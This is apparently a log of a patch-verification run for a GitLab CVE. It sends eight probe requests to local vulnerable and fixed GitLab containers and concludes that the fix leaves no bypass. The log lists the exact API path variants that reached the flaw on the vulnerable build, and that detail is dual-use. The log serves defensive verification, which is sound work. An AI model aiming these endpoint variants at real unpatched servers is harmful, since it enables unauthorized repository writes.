[08:01:22] === CVE-2026-85706 variant analysis start === [08:01:22] pulling images (idempotent)... [08:01:24] vuln digest: sha256:f63df4c43029fe91db370609c0b40a1e3585cebd06e3e9637d93a9a3030eb86e [08:01:24] fixed digest: sha256:05453dd1d9aba27c2c487613141596868409b4d03247647f7d66cb0b36f321b8 [08:01:24] booting g85706v-var from gitlab/gitlab-ce:19.3.1-ce.0 (port 8211), attempt 1... [08:03:49] g85706v-var healthy (sign_in=200 api=401) [08:03:50] vuln target binding captured (3 authenticate refs across commits.rb/files.rb/helper) PROJECT_ID=1 [08:04:25] vuln demo project id: 1 [08:04:25] planted canary with token VC1_d41d8cd98f00 on vuln build [08:04:25] attack [vuln_t1_commits_json] POST /api/v4/projects/1/repository/commits.json -> HTTP 400 (123 bytes body) [08:04:25] attack [vuln_t2_commits_slash] POST /api/v4/projects/1/repository/commits/ -> HTTP 400 (123 bytes body) [08:04:25] attack [vuln_t3_files_post_slash] POST /api/v4/projects/1/repository/files/vfile.txt/ -> HTTP 400 (123 bytes body) [08:04:25] attack [vuln_t4_files_put_slash] PUT /api/v4/projects/1/repository/files/vfile.txt/ -> HTTP 400 (123 bytes body) [08:04:25] attack [vuln_t5_files_post_plain] POST /api/v4/projects/1/repository/files/vfile.txt -> HTTP 400 (50 bytes body) [08:04:26] attack [vuln_t6_files_post_json] POST /api/v4/projects/1/repository/files/vfile.txt.json -> HTTP 400 (50 bytes body) [08:04:26] attack [vuln_t7_commits_authorize] POST /api/v4/projects/1/repository/commits/authorize.json -> HTTP 500 (22 bytes body) [08:04:26] attack [vuln_t8_files_authorize] POST /api/v4/projects/1/repository/files/vfile.txt/authorize.json -> HTTP 500 (22 bytes body) [08:04:26] VULN results: t1_commits_json_echo=true t2_commits_slash_echo=true t3_files_post_slash_echo=true t4_files_put_slash_echo=true authorize_probes=t7:500/t8:500 [08:04:26] distinct alternate trigger reproduced on vulnerable build: true [08:04:27] booting g85706f-var from gitlab/gitlab-ce:19.3.2-ce.0 (port 8212), attempt 1... [08:07:33] g85706f-var healthy (sign_in=200 api=401) [08:07:34] fixed target binding: authenticate refs = 10 PROJECT_ID=1 [08:08:13] fixed demo project id: 1 [08:08:13] attack [fixed_t1_commits_json] POST /api/v4/projects/1/repository/commits.json -> HTTP 401 (30 bytes body) [08:08:14] attack [fixed_t2_commits_slash] POST /api/v4/projects/1/repository/commits/ -> HTTP 401 (30 bytes body) [08:08:14] attack [fixed_t3_files_post_slash] POST /api/v4/projects/1/repository/files/vfile.txt/ -> HTTP 401 (30 bytes body) [08:08:14] attack [fixed_t4_files_put_slash] PUT /api/v4/projects/1/repository/files/vfile.txt/ -> HTTP 401 (30 bytes body) [08:08:14] attack [fixed_t5_files_post_plain] POST /api/v4/projects/1/repository/files/vfile.txt -> HTTP 401 (30 bytes body) [08:08:14] attack [fixed_t6_files_post_json] POST /api/v4/projects/1/repository/files/vfile.txt.json -> HTTP 401 (30 bytes body) [08:08:14] attack [fixed_t7_commits_authorize] POST /api/v4/projects/1/repository/commits/authorize.json -> HTTP 401 (30 bytes body) [08:08:14] attack [fixed_t8_files_authorize] POST /api/v4/projects/1/repository/files/vfile.txt/authorize.json -> HTTP 401 (30 bytes body) [08:08:14] FIXED results: t1_echo=false t2_echo=false t3_echo=false t4_echo=false t5_echo=false t6_echo=false authorize_probes=t7:401/t8:401 [08:08:15] variant_on_vuln=true bypass_on_fixed=false [08:08:15] === CVE-2026-85706 variant analysis complete === [08:08:15] vulnerable=gitlab/gitlab-ce:19.3.1-ce.0@sha256:f63df4c43029fe91db370609c0b40a1e3585cebd06e3e9637d93a9a3030eb86e fixed=gitlab/gitlab-ce:19.3.2-ce.0@sha256:05453dd1d9aba27c2c487613141596868409b4d03247647f7d66cb0b36f321b8 [08:08:15] VERDICT: NO BYPASS - fix blocks all tested entry points on 19.3.2 (alternate_trigger_on_vuln=true)